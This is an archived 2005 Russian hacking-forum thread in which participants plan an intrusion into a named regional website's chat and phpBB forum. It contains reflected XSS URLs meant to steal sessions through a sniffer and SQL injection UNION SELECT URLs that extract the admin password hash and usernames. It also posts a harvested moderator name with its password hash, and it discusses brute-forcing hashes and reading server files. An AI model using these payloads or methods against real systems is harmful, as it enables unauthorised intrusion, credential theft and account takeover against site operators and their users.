PDA

Просмотр полной версии : Какие дыры у него есть?

Razial
25.12.2005, 21:09
Чат http://www.nerungri.ru/cgi-bin/chat/chat.cgi
ничё не могу сделать, КАКИЕ ДЫРЫ У НЕГО?
max_pain89
25.12.2005, 21:18
http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=send_pwd&name=<script>alert(/XXX/);</script>

подставь сниффер и закодируй в URL
Razial
26.12.2005, 13:10
Поставил сниффер а как URL закодировать,
и ещё когда кидаю ссылку на снифер открывается новое окно ив нем загружаеться сниффер, поэтому в поле REFERRER нифига нет!
Razial
27.12.2005, 10:44
Вот если я подставляю снифер:
http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=send_pwd&name=<IMG src=адрес сниффера>

а дальше чё???

вот ещё
http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=userinfo&infoabout=<IMG%20src%3Dадрес>
max_pain89
27.12.2005, 13:32
я поподробнее посмотрел, там куки красть бесполезно, нужна сессия
Razial
27.12.2005, 15:58
И как узнать сессию?
Кстати там чтобы кикать, банить, короче для всего нужен мастерпароль который валяется по адресу
http://www.nerungri.ru/cgi-bin/chat/config.cgi
его оттуда никак не достать?
max_pain89
28.12.2005, 19:10
http://www.nerungri.ru/site/cnews/arhiv.shtml?Act=NewsList&Date=2004-05-06%27%20UNION%20SELECT+0,0,0,0,0,VERSION(),0,0,0,0/*

http://www.nerungri.ru/site/cnews/arhiv.shtml?Act=NewsList&Date=2004-05-06%27+UNION+SELECT+0,0,0,0,0,user_password,0,0,0,0 %20FROM%20phpbb_users%20WHERE%20user_id=2/*

вот это под форум, щас надо попросить кого-нито, чтоб привязали уязвимость к чату
Razial
28.12.2005, 20:53
Это получчается он сессию выводит, только вот чью? и какое это имеет отношение к чату?
max_pain89
28.12.2005, 21:02
нет, сейчас он выводит хэш админа http://www.nerungri.ru/phpbb/ но иногда пароли совпадают..... ты знаешь вообще модеров там каких нибуть?
Razial
28.12.2005, 21:07
Nikita, RaKoT, 1inch
xdx
28.12.2005, 23:46
Хакни phpbb сплойтом выдерешь пасс админа и поцепочно
max_pain89
28.12.2005, 23:49
я не смог пробрутить, онлайн сервисы тоже сдались
Razial
29.12.2005, 10:56
А можно как нить из конфига чата пароль достать(он не зашифрованный) как ты сделал с форумом
Razial
29.12.2005, 11:11
http://www.nerungri.ru/site/cnews/arhiv.shtml?Act=NewsList&Date=2004-05-16%27+UNION+SELECT+0,0,0,0,0,username,0,0,0,0%20FR OM%20phpbb_users%20WHERE%20user_id=3/*

а вот и их имена, id=3 1inch например
Razial
29.12.2005, 11:13
b59c67bf196a4758191e42f76670ceba
-
пароль модера

1inch
-
имя модера
max_pain89
29.12.2005, 12:47
вот только этого модера нету в чате, или ник у него другой....
Я не знаю, в Sql должна быть какая-нить возможность просмотра локальных файлов.